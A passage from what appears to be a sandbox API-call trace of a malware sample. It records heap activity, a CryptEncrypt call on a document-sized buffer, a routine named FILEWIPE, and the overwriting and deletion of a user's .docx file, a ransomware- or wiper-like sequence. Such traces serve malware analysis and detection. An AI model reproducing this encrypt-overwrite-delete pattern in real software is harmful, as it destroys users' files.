returned 1 [0033.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0033.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0033.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0033.121] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0033.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0033.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0033.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0033.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0033.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.122] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0033.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cec8 [0033.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.122] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0033.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0033.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0033.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0033.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0033.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0033.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0033.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0033.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0033.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0033.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.123] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.123] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da3f8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3f8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0033.123] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0033.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.124] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9c8 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0033.124] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0033.124] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.124] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.124] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.124] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0033.124] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0033.124] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.124] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0033.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.125] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.125] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.125] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.125] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0033.125] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xa628, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xa630) returned 1 [0033.125] CharLowerBuffW (in: lpsz="byte[42545]", cchLength=0xb | out: lpsz="byte[42545]") returned 0xb [0033.126] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.126] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.126] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9642a0*, pdwDataLen=0x6ae220*=0xa628, dwBufLen=0xa630 | out: pbData=0x9642a0*, pdwDataLen=0x6ae220*=0xa630) returned 1 [0033.126] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.126] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.126] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.131] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0033.131] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.131] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.131] CryptDestroyKey (hKey=0x7c2200) returned 1 [0033.132] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.132] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.132] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.132] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.132] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.132] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.132] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.132] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.132] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.132] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0033.132] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.132] FreeLibrary (hLibModule=0x754b0000) returned 1 [0033.133] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0033.133] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ea7d20, ftCreationTime.dwHighDateTime=0x1d57d7e, ftLastAccessTime.dwLowDateTime=0xfd67e2d0, ftLastAccessTime.dwHighDateTime=0x1d5666d, ftLastWriteTime.dwLowDateTime=0xfd67e2d0, ftLastWriteTime.dwHighDateTime=0x1d5666d, nFileSizeHigh=0x0, nFileSizeLow=0xa628, dwReserved0=0x0, dwReserved1=0x777648, cFileName="hPN6id3lN1N.docx", cAlternateFileName="HPN6ID~1.DOC")) returned 0x7c2100 [0033.133] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0033.133] CharLowerBuffW (in: lpsz="byte[42536]", cchLength=0xb | out: lpsz="byte[42536]") returned 0xb [0033.133] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0033.133] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0033.133] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0033.133] FreeLibrary (hLibModule=0x76b40000) returned 1 [0033.133] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0033.133] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0033.133] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.134] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hpn6id3ln1n.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0033.135] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.135] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0033.135] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.135] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.135] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.135] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0033.135] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.135] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.136] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.136] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx", lpFilePart=0x0) returned 0x38 [0033.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.136] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ea7d20, ftCreationTime.dwHighDateTime=0x1d57d7e, ftLastAccessTime.dwLowDateTime=0xfd67e2d0, ftLastAccessTime.dwHighDateTime=0x1d5666d, ftLastWriteTime.dwLowDateTime=0x13a22720, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xa628, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="hPN6id3lN1N.docx", cAlternateFileName="HPN6ID~1.DOC")) returned 0x7c2100 [0033.136] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hpn6id3ln1n.docx")) returned 1 [0033.137] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ea7d20, ftCreationTime.dwHighDateTime=0x1d57d7e, ftLastAccessTime.dwLowDateTime=0xfd67e2d0, ftLastAccessTime.dwHighDateTime=0x1d5666d, ftLastWriteTime.dwLowDateTime=0x13a22720, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xa628, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="hPN6id3lN1N.docx", cAlternateFileName="HPN6ID~1.DOC")) returned 0 [0033.137] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0033.138] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0033.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0033.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0033.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0033.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0033.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0033.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0033.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0033.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0033.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0033.139] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0033.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0033.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0033.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0033.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0033.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) 